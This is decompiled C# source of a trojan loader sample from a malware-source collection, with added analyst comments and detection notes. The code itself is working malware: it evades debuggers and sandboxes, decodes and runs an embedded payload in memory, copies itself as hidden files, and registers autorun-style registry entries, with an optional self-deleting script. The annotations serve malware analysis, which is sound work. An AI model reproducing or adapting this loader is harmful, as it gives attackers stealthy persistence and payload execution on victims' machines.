MalwareSourceCode/MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/_0002.cs
2022-08-18 06:28:56 -05:00



// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
// ANALYST NOTES (decompiled, obfuscated sample; comments added for defensive review only).
// This class is the loader stage of the sample. Read top to bottom, it:
//   1. optionally runs a series of environment / anti-analysis checks and exits silently if one trips,
//   2. Base64-decodes an embedded manifest resource into a byte array and runs it in-process
//      via Assembly.Load + reflection (the decoded payload is never written to disk by this class),
//   3. optionally writes a number of registry values and copies its own executable to two
//      per-user locations, marking the copies Hidden and registering the path in the registry,
//   4. optionally writes and launches a helper script.
// Every string the code uses (process names, registry paths, file names, resource name) is
// fetched through \u0008.\u0002(int), a lookup defined outside this file, so the concrete
// values are NOT visible here. NOTE(review): treat any guess about those strings as unconfirmed
// until the string table of class \u0008 has been decoded.
// Almost every step is wrapped in an empty catch, so failures are silent by design.
internal sealed class \u0002
{
// Instance of helper class \u0003 (defined elsewhere). Only used as the last-resort
// execution path in the payload runner below. NOTE(review): presumably a native
// loader/injection helper - confirm against that class.
private static \u0003 \u0002 = new \u0003();
// Two strings initialised from the same lookup key. The main routine exits unless they compare equal.
// NOTE(review): looks like a builder placeholder / tamper check - confirm.
private static string \u0003 = \u0008.\u0002(-665676900);
private static string \u0005 = \u0008.\u0002(-665676900);
// 7-byte constant; not referenced anywhere else in this class.
private static byte[] \u0008 = new byte[7]
{
(byte) 98,
(byte) 87,
(byte) 76,
(byte) 65,
(byte) 54,
(byte) 43,
(byte) 32
};
// Decoded payload bytes (filled from the embedded resource in the main routine).
private static byte[] \u0006;
// Feature toggles. Each bool below gates one stage of the main routine; the values shown are
// the field initialisers and none of them is reassigned inside this class.
// \u000E: gate for the Debugger.IsAttached check (off).
private static bool \u000E = false;
// \u000F: gate for the sleep-timing check (off).
private static bool \u000F = false;
// \u0002\u2000: gate for the first running-process check (on).
private static bool \u0002\u2000 = true;
// \u0003\u2000: gate for the hidden-Form window-title check (off).
private static bool \u0003\u2000 = false;
// \u0005\u2000 .. \u0002\u2001: gates for six further running-process checks; only \u000E\u2000 is on.
private static bool \u0005\u2000 = false;
private static bool \u0008\u2000 = false;
private static bool \u0006\u2000 = false;
private static bool \u000E\u2000 = true;
private static bool \u000F\u2000 = false;
private static bool \u0002\u2001 = false;
// The next five flags are declared but never read in this class.
private static bool \u0003\u2001 = true;
private static bool \u0005\u2001 = false;
private static bool \u0008\u2001 = false;
private static bool \u0006\u2001 = false;
private static bool \u000E\u2001 = false;
// \u000F\u2001: gate for showing the message box on a background thread (off).
private static bool \u000F\u2001 = false;
// Text and caption passed to MessageBox.Show by the message-box thread.
// NOTE(review): presumably a decoy error message - confirm after decoding.
private static string \u0002\u2002 = \u0008.\u0002(-665676875);
private static string \u0003\u2002 = \u0008.\u0002(-665676839);
// \u0005\u2002: master gate for the registry-value block (off); the four flags after it
// gate sub-steps inside that block.
private static bool \u0005\u2002 = false;
private static bool \u0008\u2002 = false;
private static bool \u0006\u2002 = false;
private static bool \u000E\u2002 = false;
private static bool \u000F\u2002 = false;
// \u0002\u2003: gate for the self-copy + registry registration block (on).
private static bool \u0002\u2003 = true;
// File name used for the dropped copies of the executable.
private static string \u0003\u2003 = \u0008.\u0002(-665676861);
// \u0005\u2003: gate for the helper-script stage at the end of the main routine (off).
private static bool \u0005\u2003 = false;
// \u0008\u2003 / \u0006\u2003: optional start-up delay and its length in seconds (off, 0).
private static bool \u0008\u2003 = false;
private static int \u0006\u2003 = 0;
// Cached delegate for the message-box thread.
private static ThreadStart \u000E\u2003;
// Returns true when at least one running process has the given name.
private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
// Shows a modal message box (OK button, "Hand"/error icon) with the given text and caption.
private static void \u0002(string _param0, string _param1)
{
int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
// Writes one decoded string to the console. Called between almost every stage below.
// NOTE(review): presumably filler inserted by the obfuscator - the string value is not visible here.
private static void \u0002() => Console.Write(\u0008.\u0002(-665677671));
// Main routine. NOTE(review): the string[] parameter suggests this is the program entry
// point, but the entry-point metadata is not visible in this file.
private static void \u0002(string[] _param0)
{
// Exit immediately unless the two configuration strings match.
if (!(\u0002.\u0003 == \u0002.\u0005))
return;
\u0002.\u0002();
// Optional: show the message box on its own thread so it does not block the rest of the routine.
if (\u0002.\u000F\u2001)
{
try
{
if (\u0002.\u000E\u2003 == null)
\u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005);
new Thread(\u0002.\u000E\u2003).Start();
}
catch
{
}
}
\u0002.\u0002();
// Anti-analysis: exit if a managed debugger is attached.
if (\u0002.\u000E)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
// Anti-analysis: sleep-skipping check. DateTime ticks are 100 ns units, so a real 10 ms
// sleep advances the clock far more than 10 ticks; the exit only fires if the sleep was
// effectively skipped (as some automated analysis environments do).
if (\u0002.\u000F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
// Anti-analysis: exit if a process with a specific (encoded) name is running.
// NOTE(review): the names are presumably analysis tools or sandbox agents - decode to confirm.
// The same pattern repeats below with different lookup keys.
if (\u0002.\u0002\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677682)))
return;
}
catch
{
}
}
// Anti-analysis: create an invisible, taskbar-less Form with a known title, then exit if
// the title reads back as a different encoded string.
// NOTE(review): presumably detects an environment that rewrites window titles - confirm.
if (\u0002.\u0003\u2000)
{
try
{
Form form = new Form();
form.Text = \u0008.\u0002(-665677636);
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u0008.\u0002(-665677647))
return;
form.Close();
}
catch
{
}
}
// Six more running-process checks, each behind its own flag.
if (\u0002.\u0005\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677662)))
return;
}
catch
{
}
}
if (\u0002.\u0008\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677616)))
return;
}
catch
{
}
}
if (\u0002.\u0006\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677626)))
return;
}
catch
{
}
}
if (\u0002.\u000E\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677579)))
return;
}
catch
{
}
}
if (\u0002.\u000F\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677586)))
return;
}
catch
{
}
}
if (\u0002.\u0002\u2001)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677795)))
return;
}
catch
{
}
}
\u0002.\u0002();
// Optional start-up delay of \u0006\u2003 seconds.
if (\u0002.\u0008\u2003)
{
try
{
Thread.Sleep(\u0002.\u0006\u2003 * 1000);
}
catch
{
}
}
\u0002.\u0002();
// Payload staging: read the embedded manifest resource as text, Base64-decode it into
// \u0002.\u0006 and start the payload runner on a new thread. This stage has no flag; it
// always runs once the checks above pass.
// Detection note: the decoded payload exists only in memory here, so file-based scanning of
// dropped artefacts will not see it; in-memory assembly-load telemetry (AMSI on runtimes
// that scan Assembly.Load(byte[]), .NET runtime loader ETW events) is the relevant signal.
try
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(-665677805));
\u0002.\u0002();
StreamReader streamReader = new StreamReader(manifestResourceStream);
string end = streamReader.ReadToEnd();
\u0002.\u0002();
streamReader.Close();
\u0002.\u0006 = Convert.FromBase64String(end);
try
{
\u0002.\u0002();
Thread thread = new Thread(new ThreadStart(\u0002.\u0003));
\u0002.\u0002();
thread.Start();
\u0002.\u0002();
}
catch
{
}
}
catch
{
}
\u0002.\u0002();
// Optional registry-value block (master flag off in this sample). All key and value names
// are encoded. Every write uses RegistryValueKind.DWord.
// NOTE(review): presumably policy-style settings that weaken or disable OS features -
// decode the strings before drawing conclusions.
if (\u0002.\u0005\u2002)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677754), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
catch
{
}
// Same value written under HKCU (creating the key if absent) and then under HKLM.
// The HKLM write needs elevation; without it the exception is swallowed by the catch.
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
catch
{
}
// Unlike its neighbours this sub-step has no try/catch, so a registry exception here
// would propagate out of the routine.
if (\u0002.\u0008\u2002)
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677354));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
// Launches an external program (encoded file name and arguments) with no window and
// without the shell.
if (\u0002.\u0006\u2002)
{
try
{
new Process()
{
StartInfo = {
FileName = \u0008.\u0002(-665677560),
Arguments = \u0008.\u0002(-665677508),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
// Two further DWord values under the same HKCU key used above (key -665677722).
if (\u0002.\u000E\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
catch
{
}
}
if (\u0002.\u000F\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
catch
{
}
}
}
\u0002.\u0002();
// Self-copy and registration block (flag on in this sample).
// Detection note: the observable behaviour is a process copying its own image into a
// per-user directory, setting the Hidden attribute on the copy, and then writing that path
// into registry values under both HKCU and HKLM. File-create and registry-set telemetry
// correlated on the same process covers all three steps.
if (\u0002.\u0002\u2003)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677163), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
catch
{
}
// Read the running executable into memory and write it out twice: once under the
// directory named by an (encoded) environment variable and once under %APPDATA%,
// both using the file name in \u0003\u2003. Both copies are then marked Hidden.
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
fileStream3.Write(buffer, 0, buffer.Length);
fileStream3.Close();
fileStream3.Dispose();
File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
}
catch
{
}
// Store the path of the first copy as a registry value under the same encoded key in
// HKCU and HKLM. NOTE(review): presumably an autorun (Run-style) key - confirm by
// decoding key -665677131. The HKLM write fails silently without elevation.
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
catch
{
}
// Optional second registration pointing at the %APPDATA% copy, under a different key.
if (\u0002.\u0005\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677073));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
catch
{
}
}
}
\u0002.\u0002();
// Final optional stage (flag off in this sample): unless already running from the
// directory named by the encoded environment variable, write a one-line text file there
// that embeds the quoted path of the current executable and its file name, then start that
// file hidden. NOTE(review): presumably a clean-up script that removes or relocates the
// original file - the surrounding command text is encoded, so confirm after decoding.
if (!\u0002.\u0005\u2003)
return;
try
{
if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176))))
return;
string str = \u0008.\u0002(-665677275) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(-665677226) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(-665677247);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
// Payload runner (thread body). Loads the decoded bytes in \u0002.\u0006 as a managed
// assembly and invokes its entry point, retrying with a different call shape each time the
// previous attempt throws:
//   1. instance from CreateInstance(entryPoint.Name), one string[] argument;
//   2. same instance target, empty argument array;
//   3. static call with null target and null arguments;
//   4. hand the bytes, an empty string and this program's own path to helper \u0003.\u0002(...).
// NOTE(review): attempt 4 presumably handles a payload that is not a loadable managed
// assembly - confirm against class \u0003. If all four fail the thread ends silently.
public static void \u0003()
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1]
{
(object) new string[0]
});
}
catch
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]);
}
catch
{
try
{
\u0002.\u0002();
MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint;
\u0002.\u0002();
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
try
{
\u0002.\u0002();
\u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath);
\u0002.\u0002();
}
catch
{
}
}
}
}
}
// Thread body for the optional message box: shows the two configured strings as text and caption.
private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002);
}